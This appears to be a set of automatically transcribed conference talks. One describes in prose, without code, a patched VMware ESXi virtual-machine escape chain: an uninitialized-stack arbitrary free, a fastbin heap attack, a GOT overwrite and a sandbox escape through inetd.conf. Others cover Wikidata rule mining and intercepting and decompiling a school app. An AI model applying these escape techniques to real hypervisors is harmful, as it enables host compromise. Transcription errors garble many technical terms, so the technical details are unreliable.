the entire explosion we use. Now let's start the first one. The first vulnerability is an initialized stack usage vulnerability. It exists in VMS net through net card. When VMS net through net card tries to execute command, updates MAC filters, it will use a structure on the stack, the physics memory page structure. This structure is used to represent the memory mapping between the guest and the host. And it's also be used to transport data between the guest and the host. Then the VMS net will call function dma create to initialize the structure on the stack first. Then it will use this structure to execute this command. And finally, it uses physics memory release to destroy the structure, the physics memory page structure. So it seems that there are no problems here. But if we look at the function dma memory create, we can notice that there is a check before the initialization of the physics memory page structure. It will check the argument address and the argument size. And if the check passes, then it will initialize the structure. But if the check feels, it will never initialize the structure on the stack. And finally, we found that we can control the address argument by writing a value to one of the registers of VMS net three. What's worth is that in function physics memory release, there is no check about if the physics memory page structure has been initialized. And it's just a free oponder of this structure. So that's the thing about it. If we can pad the data on the stack, it's possible for us to do arbitrary address free. We can pad a fake physics memory page structure on the stack and then make the check feels in the function dma memory create. And finally, when it comes to the physics memory release, it will free oponder of our physics memory page structure. So we just tried to find a function to pad the data on the stack. There is a design pattern in software development. We will store the data into the stack if the size is small when we allocate some memory. And otherwise, we will put it into the heap. And we find a function that fits this pattern. This function will be used when our guest OS executes the instruction outsp. It will check the size. If the size is smaller than 0x8000, it will use the stack to store the data. And finally, it will copy the data we send from the guest into the stack. So we can use this function to pad the data on the stack. Then how do we combine this to do arbitrary address free? We can use outsp instruction in guest OS first to pad the data on the stack. This data should contain a fake physics memory page structure. And the page count of this fixed structure should be 0. And the page error of this physics memory page structure should be the address we want to free. Then we set some registers of the VMS NAT 3 to make the check fields in the function dma memory create. And finally, we order the VMS NAT 3 net card, execute the command update MAC filters, and then in the VMS, it will use the physics memory release to destroy the structure we pad before. This structure is a fake structure we pad in the first step. And it will check the page count. If it's 0, it will free the page error of this fake structure. So we can do arbitrary address free now by using the first initialized stack usage vulnerability. Here comes the next one. The second vulnerability also exists in the VMS NAT 3 net card. The VMS NAT 3 net card tries to execute command get policy. It will first get a line from the guest, and the line must be 16. Then it initializes the first 8-bit of a structure on the stack. But it just forgets to initialize the next 8-bit of this structure and just write this structure back to our guest OS. So we can link 8-bit initialized data on the stack from the host to our guest. And after debugging the VMS process, we realize that there are fixed offsets between the images. So it's possible for us to get all the address, all the information about the address space by using this vulnerability. Now what do we have now? We can do arbitrary address free by using the first one, and we can get all information about the address space by using the second one. What do we want to do? We want to do arbitrary shell code execution in the VMS. So how do we combine these two vulnerabilities to achieve our target? It's hard for us to do arbitrary shell code execution by using arbitrary address free, but it's easy for us to do arbitrary shell code execution by using arbitrary address right. So our target changes into how to do arbitrary address right by using arbitrary address free. Then we realize that we need a stretcher. And this stretcher should include pointers we can write and the size. So once we can overwrite this stretcher, we can do arbitrary address right easily. And when we first try to exploit this vulnerability, we use some stretchers in the heap, but we found that we cannot manipulate the heap's layout stability because the VMS frequently allocates and releases memory. So we cannot use the stretchers in the heap. And after reversing some code of VMS, we find a stretcher. The stretcher's name is channel and it's used in VMware RPC-EI. What's VMware RPC-EI? VMware has a series of RPC-Max NISM to support communication between the guest and the host. And it has an interesting name, backdoor. RPC-EI is one of them. And the other words we may be familiar with is VMware Toys. I like to ask again, if anyone has installed VMware Toys in your guest OS, please use your hands again. Oh, not as much as before. So if you use a VMware Workstation, you probably have installed the VMware Toys in your guest. Because once you install it, you can use some convenient functions such as copy and pass the data and the fields between the guest and the host, drag and drop fields, and create a shell folder, and so on. VMware Toys are implemented by using some RPC-EI commands. And here are some examples about some RPC-EI commands. For example, we can use info site, guest info site to set some information about our guest. And we can use info get to retrieve this information back. What happens when we execute this RPC-EI command in our guest? For example, if we execute this RPC-EI command info site, guest info.a123 in our guest OS, what happens in VMware Max? It will cause VMware Maxit first, and finally, it will return to the RPC-EI handler of VMware Max. Then, the RPC-EI handler will choose a sub-command to use by checking the volume of the registers of our guest OS. The RPC-EI in our guest OS will use the sub-command first to open a channel and initialize it. Then, it will use the sub-command send line to set the size of our channel and allocate a heap memory to store the data of our RPC-EI command. And suddenly, it will use the send data sub-command to add the data of the memory we allocated before. And once the lines of the data we send from the guest equals to the size we set from the send line sub-command, the VMS will use a corresponding RPC-EI command handler function after a string combination. And finally, it will use a close sub-command to destroy the channel structure, including set the size to zero and free the data pointer. So that's what happens when we execute this RPC-EI command in our guest. Furthermore, there is a channel structure area in the data segment we can use. So this is a perfect structure for our exploit. Now we've got all the things we want. We've got two vulnerabilities, and we've got the structure we want. How do we combine this? We notice that the VMS uses PT-Maloc of GLab C to manage its heap. So we just choose to use the fast-beam attack. What's the fast-beam attack? Fast-beam attack is a method to exploit heap vulnerabilities of PT-Maloc by using the singly linked list. And it's the easiest exploit method to exploit the PT-Maloc, I think. It's also the first method to exploit the PT-Maloc I learned when I just started to learn how to exploit. Then after considering the check existing in the GLab C, we decided to free the address at the reply index of channel N. Because by doing that, the GLab C will treat this address as a fake trunk. And the GLab C will check the current trunk size. And after doing that, the size of the fake trunk is also the size of the channel N. So we can set a valid volume to the size of the channel N to bypass the check. So we can bypass the check. Once we free this address, this fake trunk will be put into the fast-beam linked list first. Then we can re-allocate this fake trunk by using another channel N plus 2. Now we have a data pointer pointed at the reply index of channel N. And we can easily overwrite the channel N plus 1 by using channel N plus 2. We can send the data to channel N plus 2. And finally, it will overwrite some parts of the channel N plus 1. So it's easy now for us to do arbitrary address write by thinking some parts of the channel structure. Then do you remember our target? Our target is to do a bitrate shell code execution in VMS. And we can do arbitrary address write now. There are many ways to do arbitrary shell code execution by using arbitrary address write. We choose to use the drop. We can overwrite the gotPOT segment. We can fake the channel N plus 1 structure first. Overwrite the data pointer of channel N plus 1 to the address of gotPOT segment. Then we can overwrite the function pointer on the gotPOT segment. So once the VMS uses this function, we overwrite, it will jump to our job gadget. So it's also easy for us to do arbitrary shell code execution by using wrap. So now we can do arbitrary shell code execution in the VMS process. We think that we have escaped from the virtual machine on the USSR successfully. We tried to execute some command by using a system called SA, but it fails. We tried to open and read some sensitive fields just like password. It fails again. Then we realized that there is a sandbox. We cannot execute any commands unless we escape the sandbox either. So the next part comes to the how we analyze and escaping the sandbox. Also realizing that there is a sandbox on the ESSI, we were some code of the VM kernel and we found a kernel module named as VM kernel or size control system. And this model implements the fine green checks through system call. And it seems that this sandbox is a rule-based sandbox. So we just tried to find the configure field of this sandbox. We finally found it at this directory, etc-vmware-sci-policy-domains. And it seems that there are many different sandboxes offered by VMware to the different processes in the user world. Like app, plugin, and the global VM DOM is a field for our VMS process and for our VM. After reading that, it's obvious for us that the all the virtual directory is the only directory we have read and write permissions. Then we look at the fields existing in this directory. We got a lot of PID fields, just like crowd PID, DCI PID, and so on. And it's also obvious that the i9d conf fuel is the only configure fuel we can write. Then we just, what's i9d? What's i9d? i9d is open source software and it's a super server domain that provides internet services. Then we just analyze the content of the i9d conf. The content of the i9d conf is here on the ESSI. We can find that it defends two services, SSH and OST. And some of it defends which binary will be used by different services. For example, the iSpin OST will be used by the OST services. Then also after some testing, we realize that the OST service is always enabled with SSH service in and out. So this is the only configure field we can write. Then we got an idea. How about overwrite this configure field? Therefore we can overwrite the binary part for OST. Like that we can overwrite the iSpin OST to SSH. So once we can restart the i9d process, we can band the show as the port the OST is using. Then we just find a way to restart the i9d process. We analyze the configure field of the sender box again and we found out the queue system code we can use in the VMS process. Then we just use the queue hub to restart the i9d process. Once the i9d process restarts, we can execute any commands by sending them to the port the OST is using. So that's the method we use to escape from the send box.. Find it on the YouTube and we create this demo after the gig point 2018. We get a reverse show after executing the exploit in our guest wise. So that's all. And if you want to get more details about our exploit chain, please check our paper here. And that's all. Thanks. So I don't think I'm actually worthy to share the stage with F1. Why, why, why? That was awesome. If you have questions, we have microphones. You need to come up to the microphone, line up behind them, and we'll take your question. Meanwhile, does the signal age will have anything? No questions yet? Do we not have questions from the audience? There's one. Can I have number six, please? Okay. Do you talk to VMware for this little heck? We have reported all these vulnerabilities to VMware after the gig point 2018. And it has been one year after it repaired. Okay. Thanks. That's definitely a relief. Number one, please. First of all, thanks for the great talk. I just wanted to know if there's any meaningful thing a system administrator can do to lock down the sandbox further so that we can have some preventative, basically, tasks for our ESXi setups, or if there's nothing we can do except patching, of course. I'm afraid. Can you repeat your question? It's faster for me. Sorry about that. Basically, is there anything you can do as an administrator to lock down the sandbox even more so that this is impossible or that it is harder than what you showed? Okay. That's the first question. You can set the sender boats down by executing a command on the ESXi shell. I didn't put the command here. I found the command to set the sender boats down. You can find it by searching the documents about the ESXi. I found it just by myself by using the command offered on the ESXi shell. It's not documented by the VMware. Okay. I will share this command on my Twitter later. Sorry about that. I didn't put this command into my slides. But would this have prevented the attack? Prevented. By doing that change, by doing that command, would it be possible to prevent the attack that you just showed? The sender boats are used to protect the VMS process. If you update your ESXi, I think that it will be safe. Okay. Great. We have a question from the internet. Yes. Does this exploit also work on non-AMDV VTX enabled VMs using binary translation? Okay. Is it more universal than just the AMD? Was it VX? Well, can repeat it a bit? I heard... Do it also work on non-AMDV or VTX enabled VMs using binary translation? Yes. Yes, because all these vulnerabilities exist in the virtual hardware. Yeah, you will need to use the virtual hardware in your virtual machine. So, any further questions? I'm not seeing anybody on the microphones. Any further questions from the internet? That's it. Could everybody help me in thanking F1-YYY for this fantastic talk? Thank you for watching!
VMware ESXi is an enterprise-class, bare-metal hypervisor developed by VMware for deploying and serving virtual computers. As the hypervisor of VMware vSphere, which is the world's most prevailing, state-of-the-art private-cloud software, ESXi plays a core role in the enterprise's cloud infrastructure. Bugs in ESXi could violate the security boundary between guest and host, resulting in virtual machine escape. While a few previous attempts to escape virtual machines have targeted on VMware workstation, there has been no public VMware ESXi escape until our successful demonstration at GeekPwn 2018. This is mainly due to the sandbox mechanism that ESXi has adopted, using its customized filesystem and kernel. In this talk, we will share our study on those security enhancements in ESXi, and describe how we discover and chain multiple bugs to break out of the sandboxed guest machine. During the presentation, we will first share the fundamentals of ESXi hypervisor and some of its special features, including its own customized bootloader, kernel, filesystem, virtual devices and so on. Next, we will demonstrate the attack surfaces in its current implementations and how to uncover security vulnerabilities related to virtual machine escape. In particular, we will anatomize the bugs leveraged in our escape chain, CVE-2018-6981 and CVE-2018-6982, and give an exhaustive delineation about some reliable techniques to manipulate the heap for exploitation, triggering arbitrary code execution in the host context. Meanwhile, due to the existence of sandbox mechanism in ESXi, code execution is not enough to pop a shell. Therefore, we will underline the design of the sandbox and explain how it is adopted to restrict permissions. We will also give an in-depth analysis of the approaches leveraged to circumvent the sandbox in our escape chain. Finally, we will provide a demonstration of a full chain escape on ESXi 6.7.
10.5446/53227 (DOI)
Music We have Tom and Max here. They have a talk here with a very complicated title that I don't quite understand yet. It's called Interactively Discovering Implicational Knowledge and Viki Data. They told me, the point of the talk is that I will later understand what it means and I hope I will. So good luck! Thank you very much. And have some applause please. Thank you very much. Do you hear me? Does it work? Hello? Oh, very good. Thank you very much. And welcome to our talk about the Interactively Discovering Implicational Knowledge and Viki Data. It is more or less a fun project we started for finding rules that are implicit in Viki Data and tailored just by the data it has people inserted into the Viki Data database so far. And we will start with the explicit knowledge, so the explicit data and Viki Data with Max. So, right. What is Viki Data? Maybe you have heard about Viki Data, then that's all fine. Maybe you haven't, then surely you've heard of Wikipedia. And Wikipedia is run by the Wikimedia Foundation and the Wikimedia Foundation has several other projects and one of those is Wikidata. And Wikidata is basically a large graph that encodes machine readable knowledge in the form of statements and the statement basically consists of some entity that is connected or some entities that are connected by a state, by some property and these properties can then even have annotations on them. So, for example, we have Donna Strickland here and we encode that she has received a Nobel Prize in Physics last year by this property awarded and this has then a qualifier time 2018 and also for Chappals amplification and all in all we have some 890 million statements on Wikidata that connect 71 million items using 7,000 properties. So, but there's also a bit more. So, we also know that Donna Strickland has field of work optics and also field of work lasers so we can use the same property to connect some entity with different other entities and we don't even have to have knowledge that connects the entities. We can have her date of birth which is 1959. And this is then just a plain date and not an entity. And now coming to from the explicit knowledge then we have some more. We have Donna Strickland has received a Nobel Prize in Physics and also Marie Curie has received a Nobel Prize in Physics and we also know that Marie Curie has a Nobel Prize ID that starts with FIS and then 1903 and some random numbers that basically are this ID and then Marie Curie also has received a Nobel Prize in Chemistry in 1911 so she has another Nobel ID that starts with CAM and has 1911 there and then there's also Francis Arnold who received a Nobel Prize in Chemistry last year so she has a Nobel ID that starts with CAM and has 2018 there. And now one one could assume that well everybody who has awarded a Nobel Prize ID should also have a Nobel so everybody who was awarded a Nobel Prize should also have a Nobel Prize ID and we could write that as some implication here so awarded Nobel Prize implies Nobel ID and well if you if you look sharply at this picture then there's this arrow here conspicuously missing that Donna Strickland doesn't have a Nobel Prize ID and indeed there's 25 people currently on Wikidata that are missing Nobel Prize IDs and Donna Strickland is one of them. So we call these these people that don't satisfy this implication we call those counter examples and well if you look at Wikidata on the scale of really these 890 million statements then you won't find any counter examples because it's just too big so we need some way to automatically do that and the idea is that well if we had this knowledge that well some implications are not satisfied then this encodes maybe missing information or wrong information and we want to represent that in a way that is easy to understand and also succinct so it doesn't take long to write it down should have a short representation so that rules out any anything including including complex syntax or logical quantifiers so no sparkle queries as a description of that implicit knowledge no description logic if you've heard of that and we also want something that we can actually compute on actual hardware in a reasonable time frame and well so our approach is we use formal concept analysis which is a technique that has been developed over the past several years to extract what is called propositional implications so just logical formulas of propositional logic that are an implication in the form of this awarded Nobel Prize ID implies Nobel ID and well so what exactly is formal concept analysis off to Tom. Thank you so what is formal concept analysis it was developed in 1980s by a guy called Rudolf Fülle and Bernhard Ganta and they were restructuring letters theory. Letters theory is an ambiguous name and maths it's two meanings one meaning is you have a grid and have a letters there and the other thing is they speak about orders order relations so I like steaks I like pudding and I like steaks more than pudding and I like rice more than steaks that's an order right and letters this as particular orders which can be used to represent propositional logic so easy rules like when it rains the street gets wet right so and the data representation those guys used back then they called it a formal context which is basically just a set of objects they call them objects as just a name a set of attributes and some incidents which basically means which object does have which attributes so for example my laptop has the color black so this object has some property right so there's a small example on the right for such a formal context so the objects there are some animals a pletopus that's the fun animal from Australia the mammal which is also laying eggs and which is also a venomous like widow the spider the duck and the cat so when we see okay pletopus has all the properties it has a being venomous laying eggs and being a mammal we have the duck which is not a mammal but it lays eggs and so on and so on and it's very easy to grasp some implication knowledge here an easy rule you can find us whenever you endeavor and mammal that is venomous it has to lay eggs so this is a rule that falls out of this binary data table our main problem then or at this point is we do not have such a data table for wiki data right we have the implicit graph which is way more expressive than binary data and we cannot even store wiki data as a binary table even if you try to we have no chance to compute such rules from that and for this the people from formal content analysis proposed an algorithm to extract implicit knowledge from an expert so our expert here could be wiki data it's an expert you can ask wiki data questions right using the sparkle interface you can ask you can ask is there an example for that is then a counter example for something else so in the algorithm is quite easy the algorithm is there the algorithm and some expert in our case wiki data and the algorithm keeps notes for counter examples and keeps notes for valid implications so in the beginning we do not have any valid implications so this list on the right is empty and in beginning we do not have any counter examples so the list on the left the formal context to build up is also empty and all the algorithm does now is it asks is this implication x follows y y follows x or x implies y is it true so it's a true for example that an animal that does a mammal and it is venomous lays x so now the expert which in our cases wiki data can answer it we can query that we showed in our paper we can query that so we carry it and if we if the wiki data expert does not find any counter examples it will say okay that's maybe a true thing it's yes or if it's not a true implication in wiki data it can say no no no it's not true and here's a counter example so this is something you you contradict by example you say this rule cannot be true for example when the street is red does not mean it has rained right it could be in the cleaning service car or something else so now idea what now was to use wiki data as an expert but also include a human into this loop so we do not just want to ask wiki data we also want to ask a human expert as well so we first ask in our tool the wiki data expert for some rule after that we also inquire the human expert and he can also say yeah that's true I know that or no no wiki data is not aware of this counter example I know one or the other case oh wiki data says this is true I'm aware of a counter example yeah and so on and so on and you can represent this more less as just some mathematical picture it's not very important but you can see on the left like there's an exploration going on just wiki data with the algorithm on the right an exploration a human expert versus wiki data which can answer all the queries and we combine those two into one small tool under the development so back to Max okay so for that to work we basically need to have a way of viewing wiki data or at least parts of wiki data as a former context and this former context while this this was a binary table so well what do we do we just take all the items in wiki data as objects and all the properties as attributes of our context and and then have an incidence relation that says well this entity has this property so it is incident there and then we end up with a context that has 71 million rows and 7,000 columns so well that might actually be a slight problem there because we want to have something that we can run on actual hardware and not on a supercomputer so let's let's maybe not do that and focus on a smaller set of properties that are actually related to one another through some kind of common domain yeah so it doesn't make any sense to to have a property that relates to spacecraft and then a property that relates to books that's that's probably not a good idea to try to find implicit knowledge between those two but well two different properties about spacecraft that that sounds good right so and then the interesting question is just how do we define the incidence for for a set of properties and well that actually depends very much on which properties we choose because it does for some properties it makes sense to account for the direction of the statement so there's a property called parent actually no it's it's child and then there's father and mother so and and you don't want to turn those around yes you want to have a is a child of B that that should be something different than than B is a child of a then there's the qualifiers that might be important for some properties so receiving an award for something might be something different than than receiving an award for something else but well receiving an award in 2018 and receiving one in 2017 that's probably more or less the same thing so we don't necessarily need to differentiate that and there's also a thing called subclasses and they form a hierarchy on wiki data and you might also want to take that into account because while winning something that is that is a Nobel Prize that means also winning an award itself and winning the Nobel Peace Prize means winning a peace prize so that there's also implications going on there that you want to respect so and to see how we actually do that let's look at an example so we have here well this is Donna Strickland and and for God's first name Ashken this is one of the people that won the Nobel Prize in physics with her last year and also Gerard Muro that is the third one and they all got the Nobel Prize in physics physics last year so we have all these statements here and these two have a qualifier that says with and Gerard Muro here and I don't think the qualifier is on this statement here actually but it doesn't actually matter so what what we've done here is well put all the entities in this small graph as rows in the table so we have Strickland and Muro and Ashken and also Arnold and Kiri that are not in the picture but well you can maybe remember that and then here we have awarded and we scale that by the instance of the different Nobel Prizes that people have won right so there's the physics Nobel in the first column the the chemistry Nobel Prize in the second column and just general Nobel Prizes in the third column there's awarded and that is scaled by this with qualifier so awarded with Gerard Muro and then there's field of work and we have lasers here and radio activity so we scale by the actual field of work that people have and well then if we look what what kind of incidents we get for Donna Strickland well she has a Nobel Prize in physics and that is also a Nobel Prize and she has that together with Gerard Muro and well she has field of work lasers but not radio activity then Muro itself he has a Nobel Prize in physics and that is a Nobel Prize but none of the others Ashken gets a Nobel Prize in physics and that is still a Nobel Prize and he gets that with Gerard Muro and also he works in lasers but not in radio activity so Francis Arnold has a Nobel Prize in chemistry and that is a Nobel Prize and Marie Curie she has a Nobel Prize in physics and one in chemistry and they're both a Nobel Prize and she also works in radio activity but lasers didn't exist back then so she doesn't get field of work lasers and then basically this table here is a representation of our formal context so and then we've actually gone ahead and started building a tool where you can interactively do all this thing is things and it will take care of building the context for you you just put in the properties and well Tom will show you how that works so here you see some first screenshots of this tool so please do not comment on the graphic design we have no idea about that we have to ask someone about that but you're just into logics more or less on the left you say the initial state of the game on the left you have like five boxes they're called countries and borders credit cards use of energy what's memory in computation and space launches which are just presets we defined for this can you can explore for example in the case of the credit card you can explore the properties for me data which are called card network operator and fee so you can just choose one of them or on the right custom properties you can just input the properties you're interested in in Vicky data whatever one of the seven thousands you like or some number of them on the right I chose then the credit card thingy and I now want to show you what happens if you know explore these properties right so the first step in the game is that the game will ask I mean the game the exploration process will ask is it true that every entity in Vicky data will have these three properties so are there common among all entities in your data which is most probably not true right I mean not everything in Vicky data has a fee at least I hope so what I will do now I would click the reject this implication button so the implication nothing implies everything is not true and the second step now the algorithm tries to find the minimal number of questions to obtain the domain knowledge so to obtain all valid rules in this domain so next question is is it true that everything in Vicky data that has a card network property also has a fee and an operator property and down here you can see Vicky data says okay there's 26 items which are counter examples so there are 26 items in Vicky data which have the card network property but do not have the other two ones the 26 is not a big number this could mean okay there's an error so 26 statements are missing or maybe that that's bye bye really that's the true case that's also okay but you can now choose what you think is right you can say oh I would say it this should be true or you can say no I think that's okay one of these counter examples seems valid let's reject it I in this case rejected it the next question it asks is it true that everything that has an operator has also a fee and a card network yeah this is possibly not true there's also more than 1000 counter examples one being I think a telecommunication operator in Hungary or something and so we can reject this as well next question everything that has an operator and a card network so card network means like visa mastercard whatever all this stuff is it true that they have to have a fee hmm Vicky data says no it has 23 items that contradict it but one of the items for example is the American Express gold card I suppose the American Express gold has some fee so this indicates oh there's missing data in Vicky data there is something that Vicky data does not know but should know to reason correctly in Vicky data with your sparkly queries so we can now say yeah that's that's not a reject that's an accept because we think it should be true but Vicky data things otherwise and you go on you go on this is then the last question is it true that everything that has a fee and a card network should have an operator and you see oh no counter examples this means Vicky data says this is true Vicky data says there is no count examples if you ask Vicky data it says this is a valid implication in the data set so far which could also be indicating that something is missing I'm not aware if this is possible or not but okay for me it sounds reasonable everyone had the fee and a card network should also have an operator that which means a bank or something like that so I accept this implication and then yeah you have won the implication game at the exploration game which essentially means you've won some knowledge thank you and the knowledge is you know which implications in Vicky data are true or should be true from your point of view and yeah this is more or less the state of the game so far as we programmed it in October and the next state will be to show you some how much does your opinion of the world differ from the opinion that is now reflected in the data so is what you think about the data true close to true to what is true in Vicky data or maybe Vicky data has wrong information you can find it with that but max will tell me more about that okay so let me just quickly well come come back to what we have actually done so we offer a procedure that allows you to explore properties in Vicky data and the implication knowledge that holds between these properties and well the key ideas here that when when you look at these implications that you get well there might be some that you don't actually want because they shouldn't be true and there might also be ones that you don't get but you expect to get because they should hold and and these unwanted and all missing implications they point to missing statements and items in Vicky data so they show you where the opportunities to improve the knowledge in Vicky data are and well sometimes you also get to learn something about the world and in most cases it's that the world is more complicated than you thought it was and and that's just how life is but in general well implications can guide you in your way of improving Vicky data and the state of knowledge therein so what's what's next well so what we currently don't offer in the exploration game and what we definitely will focus next on is having configurable counter examples and also filterable counter examples right now you just get a list of a random number of counter examples and well you might want to search through this list for something you recognize and you might also want to explicitly say well this one should be a counter example and that's definitely coming next then well domain specific scaling of properties there's still much work to be done currently we we only have some very basic support for that so you can have properties but you you can't do the fancy things where you say well everything that is an award should be considered as one instance of this property that's also coming and then what Tom mentioned already well compare your knowledge that you have explored through this process against the knowledge that is currently on Vicky data as a form of seeing well where do you stand what is missing in Vicky data how can you improve Vicky data and well if you have any more suggestions for features then just tell us there's a GitHub link on the implication game page and here's the link to the tool again so yeah just just let us know open an issue and have fun and if you have any questions then I guess now would be the time to ask thank you thank you very much Tom and Max so we will switch microphones now because then I can hand this microphone to you if any of you have a question for our two speakers are there any questions or suggestions yes hi thanks for the nice talk I wanted to ask what's the first question what's the most interesting implication that you found yeah that would have made for a good backup slide the most interesting implication so far most basic thing you would expect everything that is launched in space by humans having that landed from space but it has a landing date also has a start date so nothing landed on earth which was not started here yes right now the game only helps you find out implications are you also planning to have where I can also add data like for example let's say I have 25 noble laureates who don't have a noble laureate ID is there is there plans where you could give me a simple interface for me to Google and add that ID because it would make the process of adding new entities to wiki data itself more simple yes and that's that's partly hidden behind this configurable and federal counter examples thing we will probably not have an explicit interface for adding stuff but most likely interface with some some other tool built around wiki data so probably something that will give you quick statements or something like that but yes so adding adding data is definitely on the roadmap any more questions yes wouldn't it be nice to do this in other languages too like to yeah actually it's a language independent so we use wiki data and then as far as we know we get a data has no language itself you know it has just items and properties so cues and peace and whatever language you use it should be translated in the language of the properties if there is a label for that property or for that item that you have so if wiki data is aware of your language we are oh yes of course the tool still needs to be translated but that is to itself it should be hi thanks for the talk I have a question right now you only can find missing data with this right or surplus data would you think we'll be able to find wrong information with a similar approach well it actually do I mean if wiki data has a counter example to something something we would expect to be true these this could point to wrong data right if the counter example is a wrong counter example if there is a missing property or missing property to an item yes okay I get to ask a second question so the horizontal axis in the incidence matrix you said it has seven thousand it spans seven thousand columns right yes because there are seven thousand properties and wiki data but it's actually way more columns right because you multiply the property properties times the arguments right yes if you do any scaling then of course there will be a few multiple entries so that's what you mean with scaling basically yes okay you can see here already seven thousand is way too big to actually compute that how many would it be if you multiply all the arguments I have no idea probably a few million have you thought about a recursive method as counter examples maybe wrong by other counter examples like an argumentative graph or something like this actually I don't get it how can be a count example be wrong through another count example maybe some example says that cats can have golden hair and then just another example might say that this is not a cat also the property to be a cat or something cat ish is missing then okay no we have not considered so far deeper reasoning so far this horn propositional logic you know it has no contradictions because all you can do is you can't contradict by a count example but there can never be a rule that is not true so far just in your my opinion maybe but not in the logic so but we have to think about it that we have bigger reasoning right so sorry quick question sir because you're not considering all the seven thousand odd properties for each of the entities right what's your current process of filtering what are the relevant properties I'm sorry I didn't get that well we basically handpicked those so you have this input field here where you can go ahead and select your properties we also have some predefined sets okay and and there's also some some classes for groups of properties that are related that you could use if you want bigger sets for example space or family or what was the other awards is one yeah it depends on the size of the class for example for space it's not that much as 10 or 15 properties it will take you some hours but you can do because yeah 15 or something like that I think for for family it's way too much it's like 40 or 50 properties so a lot of questions I don't see any more hands maybe someone who has not asked a question yet has another one we could take that otherwise we would be perfectly on time and maybe you can tell us where you will be for deeper discussions where where people can find you probably at the cultures the hand stage yeah or just running around somewhere so there's there's also our deck numbers on the slides here at 6284 for Tom and and 6279 for me so just call and well well then we're hanging around thank you again have a round of applause thank you you
The ever-growing Wikidata contains a vast amount of factual knowledge. More complex knowledge, however, lies hidden beneath the surface: it can only be discovered by combining the factual statements of multiple items. Some of this knowledge may not even be stated explicitly, but rather hold simply by virtue of having no counterexamples present on Wikidata. Such implicit knowledge is not readily discoverable by humans, as the sheer size of Wikidata makes it impossible to verify the absence of counterexamples. We set out to identify a form of implicit knowledge that is succinctly representable, yet still comprehensible to humans: implications between properties of some set of items. Using techniques from Formal Concept Analysis, we show how to compute such implications, which can then be used to enhance the quality of Wikidata itself: absence of an expected rule points to counterexamples in the data set; unexpected rules indicate incomplete data. We propose an interactive exploration process that guides editors to identify false counterexamples and provide missing data. This procedure forms the basis of [The Exploration Game](https://tools.wmflabs.org/teg/), a game in which players can explore the implicational knowledge of set of Wikidata items of their choosing. We hope that the discovered knowledge may be useful not only for the insights gained, but also as a basis from which to create entity schemata. The talk will introduce the notions of Implicational Knowledge, describe how Formal Context Analysis may be employed to extract implications, and showcase the interactive exploration process.
10.5446/53233 (DOI)
Welcome to the next talk about free substitution for schools. Thank you for translating into German. Let's start. In general, as you know, teachers can't always teach as planned. Schools create a substitution plan. It works like this. Guests can choose conocig stories and dsbs games on their mobile devices. screens from Hynaking Media and then the schools pay extra for this fantastic web interface here, where you can sign in and view your substitution plans. You can also use this mobile app. It's not really good, though, as I will explain. This is what it looks like. Things are tiny, as you can see. It's obviously proprietary software. It depends on Google Play services. You need to zoom around. You need to scroll around to see all the information, because it's so tiny. So this is super, super optimal. I don't even know why this is so small. If you look it up on a web browser, it zooms fine when you have a small device. I really don't know how that is screwed up like that. It has useless push notifications, like new content available. It's not useful. And you have to click at least one time too much all the time. And due to these issues, I always wanted something that is better than DSP mobile. So I began capturing DSP mobile's network traffic. Surprisingly, in Android, this is really easy. You can use user-friendly software like HTTP Canary, which is this one, or Packet Capture, which is this one. It's unfortunately proprietary, but I don't know any non-proprietary software for this. If you know any, please tell me. It acts like a VPN provider app and proxies all the traffic that is going out through it, installs a certificate in your system, so that apps still think that the network connection is secure. And then this app will decrypt and store and re-encrypt all the traffic that is going out and in. So you can read it then. This is essentially like an attacker in the middle attack, that you're doing yourself on your own network traffic. Except on recent Android versions, apparently, Android doesn't trust certificates that you install anymore. So you actually now have to have root access to move them to this location slash system, slash VTC slash security slash CA certs, so that they are ultimately trusted. And this is unfortunate because it makes it a little more difficult. But in all our Android versions, it works really easy. With more effort, this capturing of network traffic can be circumvented by implementing a kind of certificate pinning so that the app checks beforehand which certificates it trusts and which it doesn't. With more effort, such a prevention could also be circumvented. But DSP Mobile didn't have that. So I could figure out how this endpoint works. As you can see, it's called the iPhone service on Android. Using your user ID and the password, you can request an auth token. It has the form of this. Actually, that's what it looks like when you have invalid credentials. So if it returns this, then your credentials are not valid. It never changes. So I don't know what the use of this token is. However, DSP Mobile never stored it, even though it's the same all the time. So it took one extra round trip time every login to fetch this never-changing auth token. Using this auth token, you can request your substitution plan URL. And then once you have this substitution plan URL, you can access your substitution plan. OK. So using this knowledge, I developed a client that allows me to directly have access to just the relevant information, and I call it DSP Direct. The very first thing it did better than DSP Mobile is that it displayed things not as tiny. This is a kind of old screenshot. As you can see, these HTML files here can be parsed using a parser and such that you can filter it. You can have useful notifications that I added later on. This is a native list, not a web view, so it feels better. And yeah, of course it's not proprietary, but free software. Oh, by the way, this logo, it's supposed to represent my school's logo, this one. Yeah, please don't tell me I did too bad. OK. At least it's different from the DSP Mobile logo. SendPoint is fun in other regards. The first time I encountered it, it allowed completely unencrypted connections, and the website did not redirect users to HTTPS. So actually, most of the time, input your username and password and transmit it unsecurely. It's supported up to TLS version 1.0, which is obsolete. It's supported SSL version 2, which enables a drown attack, which I didn't quite understand, but apparently those aren't very likely to be exploited here, but it could allow attackers to read your traffic. I informed the company about this on August 11, and I believe this is when I introduced the not my fault grumble tag in the issue tracker tracker. They were happy to be informed about this. On August 22, they enabled TLS version 1.2, disabled SSL version 2, still allowed insecure connections, and I also noticed that they embedded fonts from Google, and this is obviously bad for privacy, so I told them about that twice. September 19, the iPhone service 404 is if the connection is insecure, however, Google fonts are still embedded. Anyhow, it's October 4 that the iPhone service is shut down, so I start focusing on the new endpoint that apparently the DSP apps have been using for a while that I didn't notice that, so I had to figure out how this data format works. Looks like this, so you can see it has a JSON body using, which has a request, which is an object that has data, which is a string. So I wanted to figure out how to read this. It looks like base64 when unescaping these slashes, of course, because it's coded in JSON. However, decoding this JSON string here did not, this base64 string did not deliver a nice result, so I had to look for clues by decompiling the app. There are online tools for that. Unfortunately, the app was minified, which is obfuscated during compile time, which made the results not very readable, which means that once you have it decompiled, you will have the first function in these class appears, A, and second one is B or something. Fortunately, I don't remember how exactly I did that, so instead, we're going to have to look at whether this was legal or not, because that's interesting too, because I think it is. Let's look at paragraph 69EURHG, copyright law, copyright law, decomplification. The condition of the right-hand man is not necessary when the, and here it says, the refurbishment of the code or the translation of the code from the meaning of the paragraph 9, 6, 10, number 1 and 2, meant decomplification. Unabashedly, it is about the necessary information for the manufacturing of interoperability of an independent computer program, with other programs to hold, so far, following decisions are fulfilled. So it says, you may decompile without permission when it is strictly necessary, while trying to create interoperability between two programs created independently from each other under these conditions. 